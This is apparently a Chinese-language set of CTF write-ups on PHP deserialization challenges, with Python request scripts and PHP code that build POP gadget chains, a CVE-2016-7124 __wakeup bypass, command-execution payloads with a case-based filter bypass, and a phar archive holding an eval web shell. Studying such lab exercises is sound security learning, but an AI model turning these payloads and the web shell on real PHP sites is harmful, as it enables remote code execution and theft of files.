Web入门-PHP反序列化漏洞
[SWPUCTF 2021 新生赛]no_wakeup
反序列化时触发__wakeup
函数,考虑绕开。
// Baseline payload for no_wakeup: build the object the challenge expects and
// print its serialized form. HaHaHa is declared by the challenge's class.php,
// not here, so this fragment only runs inside that context.
$aa = new HaHaHa();
$aa->admin = "admin";
$aa->passwd = "wllm";
// serialize() should emit O:6:"HaHaHa":2:{...}; the number after the class
// name is the property count, which the CVE-2016-7124 variant on this page
// raises to 3 so that affected PHP versions skip __wakeup().
$stus = serialize($aa);
print_r($stus);
CVE-2016-7124：序列化字符串中声明的属性个数与对象实际属性个数不符（大于实际个数）时，受影响版本的 PHP（5.6.25 之前、7.0.10 之前）不会调用 __wakeup 函数，构造：
O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
payload:
import requests

# Sends the CVE-2016-7124 variant of the payload: the declared property count
# (3) exceeds the two properties actually present, so PHP versions affected by
# that bug skip __wakeup() during unserialize().
response = requests.get('http://node4.anna.nssctf.cn:28398/class.php?p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}')
# Only the tail of the body is printed; 44 chars is presumably sized to the
# flag, which the challenge appends at the end of the page.
print(response.text[-44:])
[SWPUCTF 2021 新生赛]pop
找链子打。
<?php
// Class skeletons mirror the challenge source (presumably copied from it) so
// that serialize() produces exactly the layout the target's unserialize()
// expects: same class names, same property names, same visibility.
class w44m{
    // Private and protected properties serialize with NUL-mangled names
    // ("\0w44m\0admin" and "\0*\0passwd"), which is why the result must be
    // urlencode()d before it can travel in a query string.
    private $admin='w44m';
    protected $passwd='08067';
}
class w22m{
    public $w00m;
}
class w33m{
    public $w00m;
    public $w22m;
}
// Nesting: w22m -> w00m holds a w33m -> w00m holds a w44m, with w33m's
// w22m set to the string the challenge checks for.
$a=new w22m();
$b=new w33m();
$c=new w44m();
$a->w00m=$b;
$b->w00m=$c;
$b->w22m='Getflag';
echo urlencode(serialize($a));
?>
exp:
import requests

# The w00m parameter carries the urlencoded chain produced by the PHP snippet
# above. The %00 sequences are the NUL bytes of the mangled private/protected
# property names (\0w44m\0admin, \0*\0passwd); they cannot appear raw in a URL,
# which is why the payload was urlencode()d rather than pasted as-is.
response1=requests.get('http://node5.anna.nssctf.cn:28507/index.php?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D')
# Print only the tail of the body; 44 chars is presumably sized to the flag.
print(response1.text[-44:])
[HUBUCTF 2022 新生赛]checkin
弱比较（==）下，true 与任何真值（非空且不为"0"的字符串）比较都为 true，所以两个字段都传 b:1 即可通过校验。
<?php
// Loose-comparison payload for checkin: under ==, PHP's true equals any
// truthy string, so serializing both fields as b:1 satisfies the check
// without knowing the real username or password.
$b = serialize([
    'username' => true,
    'password' => true,
]);
echo $b;
?>
payload:
http://node5.anna.nssctf.cn:28305/?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}
[NISACTF 2022]babyserialize
PHP魔术方法:
__wakeup()
:unserialize() 恢复出对象后被调用。
__call()
:调用不可访问或不存在的方法。
__toString()
:对象被当作字符串使用时。
__invoke()
:以函数方式调用对象。
__set()
:给不可访问或不存在属性赋值。
有俩坑:$fun
必须改为别的,要不总是进入hint()
;命令执行有WAF,可大小写绕过。
// babyserialize chain. TianXiWei, Ilovetxw, four and NISA come from the
// challenge source, which is not reproduced here; this fragment only runs
// with those class definitions in scope.
$payload=new TianXiWei();
$payload->ext=new Ilovetxw();
$payload->ext->huang=new four();
$payload->ext->huang->a=new Ilovetxw();
$payload->ext->huang->a->su=new NISA();
// $fun must differ from its default, otherwise the chain always lands in
// hint() (see the notes above the code).
$payload->ext->huang->a->su->fun="asdf";
// The challenge filters the lowercase function name; PHP resolves function
// names case-insensitively, so the mixed-case spelling still executes. A
// denylist that is case-sensitive is therefore not a real control here.
$payload->ext->huang->a->su->txw4ever='System("cat /fllllllaaag");';
echo(urlencode(serialize($payload)));
[NISACTF 2022]bingdundun~
构造Phar,打包后.phar文件其实就是个类似.jar的压缩文件,里面有个67.php,内容为payload:
<?php
// Builds the phar archive that is uploaded as bingdundun's "zip". Writing a
// phar requires phar.readonly=0 in php.ini; the path below is the author's
// local workbench, adjust it when reproducing.
$payload='<?php @eval($_POST["cmd"]);?>';
$phar=new Phar("/home/monoceros406/Desktop/CTF-Workbench/example.phar");
$phar->startBuffering();
// phar:// recognises an archive by the __HALT_COMPILER(); marker in the stub,
// not by the file extension, which is why the upload can carry a .zip name.
$phar->setStub("<?php __HALT_COMPILER();?>");
// 67.php is the member later addressed as phar://<upload>/67.php.
$phar->addFromString("67.php","$payload");
$phar->stopBuffering();
?>
phar:// 伪协议不依赖文件后缀名，而是通过 setStub 写入的 __HALT_COMPILER(); 标记来识别归档，因此可改成 .zip 后缀上传；服务端若把用户可控的路径直接交给文件函数，就应拒绝 phar:// 等伪协议，而不是只校验后缀。
上传后访问:
http://node5.anna.nssctf.cn:28678/?bingdundun=phar://0f2c819eaf2a6ec7a8b16be40c7413e5.zip/67.php
Antsword连即可。
[SWPUCTF 2022 新生赛]1z_unserialize
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}
[SWPUCTF 2022 新生赛]ez_ez_unserialize
反序列化构造过长链子绕过__wakeup
,exp:
<?php
// Class copied from the ez_ez_unserialize challenge so the emitted string
// matches what the target's unserialize() expects.
class X{
    public $x = __FILE__;
    function __construct($x){
        $this->x = $x;
    }
    // __wakeup() is the guard: it resets $x to the current file, so a
    // normally deserialized object can only ever highlight itself.
    function __wakeup(){
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    // __destruct() runs regardless of whether __wakeup() did, which is what
    // the bypass relies on.
    function __destruct(){
        highlight_file($this->x);
    }
}
$a=new X("fllllllag.php");
// The string printed here is then hand-edited (see the note after the code)
// so that the property count no longer matches; on PHP versions affected by
// CVE-2016-7124 that skips __wakeup() while __destruct() still fires.
echo(urlencode(serialize($a)));
?>
更改类“X”的长度更大,而不是更改类的个数,即更改大括号前的数字。
[NISACTF 2022]popchains
protected
型变量直接类内赋值。
<?php
// popchains gadget chain. The three classes are presumably copied from the
// challenge source; the trigger sequence, all inside unserialize() on the
// target, is:
//   Road_is_Long::__wakeup() -> preg_match() string-casts $this->page
//   -> inner Road_is_Long::__toString() reads $this->string->page
//   -> Make_a_Change has no $page, so __get() calls $this->effort()
//   -> Try_Work_Hard::__invoke() -> include("/flag").
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }
    // The denylist only inspects $page as a string; giving it an object
    // turns the check itself into the first link of the chain.
    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}
class Try_Work_Hard{
    // Protected properties serialize with a NUL-mangled name, so the value is
    // fixed in the class declaration rather than assigned after construction.
    protected $var="/flag";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }
    // Reached when a missing property is read; whatever sits in $effort is
    // called as a function, which is how Try_Work_Hard::__invoke() is hit.
    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
$payload1=new Road_is_Long();
$payload1->page=new Road_is_Long();
$payload1->page->string=new Make_a_Change();
$payload1->page->string->effort=new Try_Work_Hard();
echo(urlencode(serialize($payload1)));
?>
[第五空间 2021]pklovecloud
<?php
// pklovecloud: the challenge source is reproduced (flag.php is only present
// on the target) and a bare acp object is serialized. The string cast that
// starts the chain happens on the target side and is not shown here.
include 'flag.php';
class pkshow{
    function echo_name(){
        return "Pk very safe^.^";
    }
}
class acp{
    protected $cinder;
    public $neutron;
    public $nova;
    // Constructing acp here is enough: $cinder is filled with an ace object,
    // and that nested object is what gets serialized.
    function __construct(){
        $this->cinder=new ace;
    }
    function __toString(){
        if(isset($this->cinder))
            return $this->cinder->echo_name();
    }
}
class ace{
    public $filename="../nssctfasdasdflag";
    public $openstack;
    public $docker=NULL;
    function echo_name(){
        // $docker is left NULL on purpose: unserialize() of an empty value
        // yields false, and $heat is never defined (so it is null). On the
        // PHP version the challenge presumably runs, writing a property onto
        // false auto-creates an object whose $nova is also null, so the
        // strict comparison below holds. (PHP 8 makes that write an Error.)
        $this->openstack=unserialize($this->docker);
        $this->openstack->neutron=$heat;
        if($this->openstack->neutron===$this->openstack->nova){
            $file="./{$this->filename}";
            if(file_get_contents($file)){
                return file_get_contents($file);
            }
            else{
                return "keystone lost~";
            }
        }
    }
}
$payload1=new acp();
echo(urlencode(serialize($payload1)));
?>